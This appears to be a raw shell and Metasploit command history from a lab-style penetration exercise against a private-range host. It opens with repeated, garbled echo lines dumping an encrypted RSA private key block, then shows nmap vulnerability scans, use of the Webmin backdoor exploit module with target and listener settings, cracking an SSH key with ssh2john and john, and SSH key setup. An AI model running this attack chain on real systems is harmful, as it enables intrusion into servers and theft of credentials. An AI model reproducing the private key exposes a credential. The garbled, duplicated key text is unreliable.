XMmULzR28OIOVrkcUeZPVlv+aIpLd6zbe8mfIEDCzH9G\n\nQ9Z2LPIWU200w5daHsXp/qukKdDn1CB4JinKvtLka3Q4i6EHj+Vp7bvhmFpapjdW\n\n/BXnD+JMm+w9ZTRsHqrXKsAEyVhM99hWoFz2k1s+Q003y/7I/0XmPETD4GJZAfqX\n\nWzolChBDCjWIMZ/9j5JREtzWX3s7+k32TFws/jPKzXEB21M2Szn23pkoXp+zyqT6\n\nbTXmV+hQf+gS7PjVRthqPONau6on19uDDVXNeuVygP4T8H5v6kAurFVX1rvkbaSm\n\nsCLJmNBb/7o7QR1Hhvo7NN1z85CJr9yxC6MqLbbcv91Mhb3w1Ce2eL+QnhgE86HE\n\nI0lvTSHTPFgvw00pV4bypACc28X+0YjRVRFOxqZxidw256pubOjRjIHIG5n6eMYk\n\nW3XiLqeGN7DLwY8X6RXfqafVQmJR6j3zB/PAoSVh25eTQwl2i1rgYzo0IGcdwUxN\n\nKHGCl8kHWe7ks3KT4+WU9uZZAhAECaWJvLzo2Ba6dst/Ke7KEtmGwv5ExUUvfHve\n\n0mt+olWJFSJa072UPuHe7gWdlexqh0l59q4ohOG+zJke1u74Br9wo6KIv54IqGVS\n\ny2O0rVCjsin3d2h9F0Fp0Xvc3EHZD7ct2HvZEV6x3kUlfdWeHKuF+7wUeTJfSmvq\n\n9+LnogQTclKAVk8htnrxBQh7aPLBAyTaXACAL31bB0ZXfh0yhJX6bXIe+EVPNaf6\n\nrJf/WLYf6/Lmfgv/ECF+VqdLPGkLT8dEgrajh9t2TaoU+/+mxtGXaJ7Iea9I+g9l\n\n22unE+jCDSQMF9IygWb8HfzBsruZ7IQ+/h7g7XDpEZrJf6+mdmbzBXLwlnnD1XG3\n\nFEJ08UNnUQsuqoD+vPxunBwkFv5b/5yt0XMu9tZdXk9AW9BdasCIE1bY+au0cnTX\n\nrjmFQ+KmCqH5lReI0Ai3fJ8pnZ2D3/m7AV/1llNaijp9NmriqK0jiVBpnEM+uH3a\n\nWtUQOqd4QS2S8MwjPoBZ0hpXOY0JX95EvWhp58uOy0/o8yYSbb+bZe7g0+MJuF9R\n\nRj6xI5CiBdDo83VdQHlyaUawTlv/wUpqSRc9xsK/y2dLjzQhAD+QkWbm98jrcAGX\n\nTlqk1XDm0e9sNcXus5d5pnTWeCH4bnwnQDo0Ot/KljNmnG11/FXuPFnAToOq52Az\n\nSqV4xTHhlfTZQcjVD+Rc44JkIFTr2gzDvcLOOMwcBf232/ySokL9xuMlLVc04Jy2\n
echo "-----BEGIN RSA PRIVATE KEY-----\n\nProc-Type: 4,ENCRYPTED\n\nDEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4\n\n\n\n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\n
echo "-----BEGIN RSA PRIVATE KEY-----\n\nProc-Type: 4,ENCRYPTED\n\nDEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4\n\n\n\n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\n
echo "-----BEGIN RSA PRIVATE KEY-----\n\nProc-Type: 4,ENCRYPTED\n\nDEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4\n\n\n\n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\n
echo "-----BEGIN RSA PRIVATE KEY-----\n\nProc-Type: 4,ENCRYPTED\n\nDEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4\n\n\n\n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\n
ll
exploit
sessions -u 1
whoami
ifconfig
nmap  -sn  172.18.1.5
nmap --script nmap-vulners/ -sV  172.18.1.5
nmap -sV --script nmap-vulners/  172.18.1.5
cd /usr/share/nmap/scripts/
cd /usr/share/nmap/scripts/
cd /usr/share/nmap/scripts/
git clone https://github.com/vulnersCom/nmap-vulners.git
git clone https://github.com/vulnersCom/nmap-vulners.git
nmap  -sn  172.18.1.5
nmap -sV --script vuln  172.18.1.5
nmap -sV --script vuln  172.ULNERABLE:
find . -name "httpd"
find . -name "httpd"
find . -name "httpd"
nmap -sV -p 172.18.1.5
nmap -sV 172.18.1.5
nmap -sV -p 172.18.1.5
netstat -a
nmap -sV -p 172.18.1.5
nmap -sV -p 5
nmap -sV -p 5
nmap -sV -p
nmap -sV -p 172.18.1.5
nmap -sV 172.18.1.5
nmap -sV -p 1000
nmap -sV -p 10000
nmap -sV -p 10000
nmap -sV --script=vulscan/vulscan.nse www.example.com 172.18.1.5
ls
nmap -sV --script=vulners.nse 172.18.1.5
nmap -sV --script=vulners.nse 172.18.1.5
nmap -sV --script=vulners.nse 172.18.1.5
nmap -sV --script=vulners.nse 172.18.1.5
ls
cd ..
cd ..
ls
cd metasploit-framework
ls
cd scripts
ls
meterpreter
msfconsole -g
exit
msfconsole -q
help
vulns
analyze 172.18.1.5
db_connect
db_connect 172.18.1.5
loot
analyze
db_connect http://localhost:8080
analyze
help
use 172.18.1.5
spool 172.18.1.5
connect 172.18.1.5
h
-h
connect -z 172.18.1.5
connect 172.18.1.5
connect -C 172.18.1.5
connect -C 172.18.1.5.10000
use
use wembin
use webmin
use 0
set parameter RHOSTS
set parameter LHOSTS
run
set RHOSTS
set RHOSTS true
set LHOSTS true
run
show payloads
set RHOSTS
set LHOSTS
set RHOSTS 172.18.1.5
set LHOSTS 172.18.1.5
run
--parameters
parameters
use 2
set RHOSTS 172.18.1.5
set LHOSTS 172.18.1.5
run
use 5
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
ping 172.18.1.5
arp -a
ipconfig
ifconfig
nmap -sT -p- 172.18.1.5
nmap -v --script vuln 172.18.1.5
nmap -v --script vuln 172.18.1.5
netstat -b
netstat
netstat -an | find 172.18.1.5
netstat -an | find "172.18.1.5"
netstat -an | find "172.18.1.5"
netstat -an | find "172.18.1.5"
netstat -an | find "172.18.1.5"
netstat -an | find "172.18.1.5"
netstat -an | find "172.18.1.5"
netstat -an | find "172.18.1.5"
netstat -an | find "172.18.1.5"
nmap -v --script vuln 172.18.1.5
nmap -sV 172.18.1.5 -p 1000
nmap -sV 172.18.1.5 -p 1000
nmap -sV 172.18.1.5 -p 22
nmap -help
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
ssh 172.18.1.5
ssh 172.18.1.5
search
search cve:2019 type:exploit platform:-linux
search cve:2019 type:exploit platform:-linux rank
search cve:2019 type:exploit platform:-linux | grep webmin
search cve:2019 type:exploit platform:-linux | grep *webmin
search cve:2019 type:exploit platform:-linux | grep *webmin*
search cve:2019 type:exploit platform:-linux
use
use exploit/unix/webapp/webmin_upload_exec
exploit -j
exit
msfconsole
search cve:2019-15107
use exploit/linux/http/webmin_backdoor
exploit -j
help
show targets
show payloadws
show payloads
show options
set parameter
set RHOSTS 172.18..5
set RPORT 10000
set LHOST 10.1.135.83
explot
exploit
ru n
run
set RPORT 1000
run
set RHOSTS 172.18.1.5
run
set RPORT 10000
ls
vim textak.txt
python3 ssh2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/textak.txt hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
nmap 172.18.1.5
nmap --help
nmap -sV 172.18.1.5
metasploit --help
msfcli
search name:webmin
use exploit/47230
show options
set RHOSTS 172.18.1.15
show missing
set LHOST 4567
show missing
run
exit
msfconsole
msfcli
use exploit/linux/http/webmin_backdoor
show missing
set RHOSTS 172.18.1.15
run
exploit
show options
set RHOSTS 172.18.1.15:10000
run
set RHOSTS 172.18.1.15
run
set autocheck false
run
set RHOSTS 172.18.1.5
run
show options
ip a
set LHOST 10.1.135.83
cd /root/.ssh
su
cd $HOME/.ssh
ls -la $HOME
ls -la
mkdir .ssh
cd .ssh
ssh-keygen -t rsa
ls .ssh
ls
cat id_rsa.pub
cat id_rsa.pub
run
